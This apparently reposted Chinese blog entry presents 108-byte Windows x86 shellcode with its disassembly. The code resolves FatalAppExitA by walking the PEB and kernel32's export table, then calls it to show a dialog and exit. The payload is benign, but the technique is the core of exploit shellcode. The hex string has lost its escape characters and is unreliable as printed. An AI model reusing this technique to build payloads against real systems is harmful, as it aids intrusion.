• shellcode搜集

    好像WINDOWS版本都行的   利用 FatalAppExit  函数 弹出对话框 然后结束  shellcode串很短

    00406032    B2 30           mov dl,0x30
00406034    64:8B12         mov edx,dword ptr fs:[edx]
00406037    8B52 0C         mov edx,dword ptr ds:[edx+0xC]             ; _PEB_LDR_DATA
0040603A    8B52 1C         mov edx,dword ptr ds:[edx+0x1C]            ; InInitializationOrderModuleList 第一项
0040603D    8B42 08         mov eax,dword ptr ds:[edx+0x8]             ; InMemoryOrderLinks
00406040    8B72 20         mov esi,dword ptr ds:[edx+0x20]            ; FullDllName
00406043    8B12            mov edx,dword ptr ds:[edx]                 ; InInitializationOrderModuleList 第二项
00406045    807E 0C 33      cmp byte ptr ds:[esi+0xC],0x33
00406049  ^ 75 F2           jnz XlastTest.0040603D
0040604B    89C7            mov edi,eax
0040604D    0378 3C         add edi,dword ptr ds:[eax+0x3C]            ; pe
00406050    8B57 78         mov edx,dword ptr ds:[edi+0x78]            ; 导出表
00406053    01C2            add edx,eax
00406055    8B7A 20         mov edi,dword ptr ds:[edx+0x20]            ; ENT
00406058    01C7            add edi,eax
0040605A    31ED            xor ebp,ebp
0040605C    8B34AF          mov esi,dword ptr ds:[edi+ebp*4]
0040605F    01C6            add esi,eax
00406061    45              inc ebp
00406062    813E 46617461   cmp dword ptr ds:[esi],0x61746146          ; CMP NAME 0-3
00406068  ^ 75 F2           jnz XlastTest.0040605C
0040606A    817E 08 4578697>cmp dword ptr ds:[esi+0x8],0x74697845      ; 8-11
00406071  ^ 75 E9           jnz XlastTest.0040605C                     ; FatalAppExit 函数显示一个消息框,并终止应用程序时,消息框关闭
00406073    8B7A 24         mov edi,dword ptr ds:[edx+0x24]            ; 导出序列号数组
00406076    01C7            add edi,eax
00406078    66:8B2C6F       mov bp,word ptr ds:[edi+ebp*2]             ; 得到序列号
0040607C    8B7A 1C         mov edi,dword ptr ds:[edx+0x1C]            ; EAT
0040607F    01C7            add edi,eax
00406081    8B7CAF FC       mov edi,dword ptr ds:[edi+ebp*4-0x4]       ; 得到函数地址
00406085    01C7            add edi,eax                                ; get the address of FatalAppExiA
00406087    68 64614001     push 0x1406164
0040608C    68 4070616E     push 0x6E617040
00406096    89E1            mov ecx,esp
00406098    FE49 07         dec byte ptr ds:[ecx+0x7]
0040609B    31C0            xor eax,eax
0040609D    51              push ecx
0040609E    50              push eax
0040609F    FFD7            call edi

    "x31xD2xB2x30x64x8Bx12x8Bx52x0Cx8Bx52x1Cx8Bx42x08x8Bx72x20x8B"
"x12x80x7Ex0Cx33x75xF2x89xC7x03x78x3Cx8Bx57x78x01xC2x8Bx7Ax20"
"x01xC7x31xEDx8Bx34xAFx01xC6x45x81x3Ex46x61x74x61x75xF2x81x7E"
"x08x45x78x69x74x75xE9x8Bx7Ax24x01xC7x66x8Bx2Cx6Fx8Bx7Ax1Cx01"
"xC7x8Bx7CxAFxFCx01xC7x68x64x61x40x01x68x40x70x61x6Ex89xE1xFE"
"x49x07x31xC0x51x50xFFxD7"
//108 bytes  Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
  • 相关阅读:
    Eclipse新建工程编译R cannot be resolved to a variable问题
    Eclipse如何生成jar包
    Springmvc+Shiro实战
    封装springmvc处理ajax请求结果
    jquery操作cookie
    探讨jsp相对路径和绝对路径
    spring集成quartz
    Spring-Task
    bootstrap table分页(前后端两种方式实现)
    jquery file upload示例
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982379.html
Copyright © 2020-2023  润新知